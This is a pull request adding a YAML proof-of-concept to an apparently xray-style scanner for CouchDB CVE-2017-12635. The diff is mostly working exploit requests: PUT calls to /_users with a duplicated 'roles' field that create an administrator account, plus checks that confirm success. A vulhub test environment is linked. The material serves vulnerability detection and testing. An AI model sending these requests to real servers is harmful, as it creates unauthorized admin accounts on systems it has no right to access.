### PR TITLE
增加couchdb垂直权限绕过漏洞

### DIFF
--- a/pocs/couchdb-cve-2017-12635.yml
+++ b/pocs/couchdb-cve-2017-12635.yml
@@ -32,6 +32,6 @@ rules:
     expression: |
       (status==201 && body.bcontains(b'zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR')) || (status==409 && body.bcontains(b'conflict'))
 detail:
-  author: ImgBotApp
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:
     - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635

--- a/pocs/couchdb-cve-2017-12635.yml
+++ b/pocs/couchdb-cve-2017-12635.yml
@@ -1,36 +1,23 @@
 name: poc-yaml-couchdb-cve-2017-12635
+set:
+  r1: randomLowercase(32)
 rules:
   - method: PUT
-    path: '/_users/org.couchdb.user:zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR'
+    path: '/_users/org.couchdb.user:{{r1}}'
     headers:
-      Content-Length: '179'
       Content-Type: application/json
+      Content-Length: '192'
     body: |-
       {
         "type": "user",
-        "name": "zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR",
-        "roles": ["_admin"],
-        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
-      }
-    follow_redirects: false
-    expression: |
-      (status==403 && body.bcontains(b'forbidden')) || (status==409 && body.bcontains(b'conflict'))
-  - method: PUT
-    path: '/_users/org.couchdb.user:zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR'
-    headers:
-      Content-Type: application/json
-      Content-Length: '195'
-    body: |-
-      {
-        "type": "user",
-        "name": "zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR",
+        "name": "{{r1}}",
         "roles": ["_admin"],
         "roles": [],
         "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
       }
     follow_redirects: false
     expression: |
-      (status==201 && body.bcontains(b'zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR')) || (status==409 && body.bcontains(b'conflict'))
+      status==201
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
   links:

--- a/pocs/couchdb-cve-2017-12635.yml
+++ b/pocs/couchdb-cve-2017-12635.yml
@@ -1,0 +1,37 @@
+name: poc-yaml-couchdb-cve-2017-12635
+rules:
+  - method: PUT
+    path: '/_users/org.couchdb.user:zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR'
+    headers:
+      Content-Length: '179'
+      Content-Type: application/json
+    body: |-
+      {
+        "type": "user",
+        "name": "zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR",
+        "roles": ["_admin"],
+        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
+      }
+    follow_redirects: false
+    expression: |
+      (status==403 && body.bcontains(b'forbidden')) || (status==409 && body.bcontains(b'conflict'))
+  - method: PUT
+    path: '/_users/org.couchdb.user:zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR'
+    headers:
+      Content-Type: application/json
+      Content-Length: '195'
+    body: |-
+      {
+        "type": "user",
+        "name": "zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR",
+        "roles": ["_admin"],
+        "roles": [],
+        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
+      }
+    follow_redirects: false
+    expression: |
+      (status==201 && body.bcontains(b'zKpjpNMnmdpbTnkjB7CZvTecKT3JAjP8lHR')) || (status==409 && body.bcontains(b'conflict'))
+detail:
+  author: ImgBotApp
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635


### PR DESCRIPTION
## 本 poc 是验证couchdb垂直权限绕过漏洞

## 测试环境

可以使用的`docker-compose`测试环境地址如下：
`https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635`
